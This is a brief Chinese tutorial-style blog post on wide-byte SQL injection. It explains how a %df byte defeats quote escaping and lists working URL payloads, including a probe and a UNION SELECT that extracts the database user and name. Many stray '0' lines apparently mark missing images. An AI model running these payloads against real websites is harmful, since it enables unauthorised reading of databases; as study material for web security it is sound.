10.宽字节注入

原理
利用%df使注入语句逃逸
0
 
0
 
0
代码审计
0
黑盒测试下的宽字节注入
试探
0
字符型试探
?id=1%df%27%23
0
试探成功
注入获取敏感信息
?id=1%df%27 union select 1,2,3%23
 
0
 
?id=%df%27 union select 1,user(),database() %23
这里的关键要让第一个语句错误 :?id=%df%27
这里让第一个语句直接错误
0
 
posted @ 2023-11-11 10:35  白牧羊人  阅读(4)  评论(0编辑  收藏  举报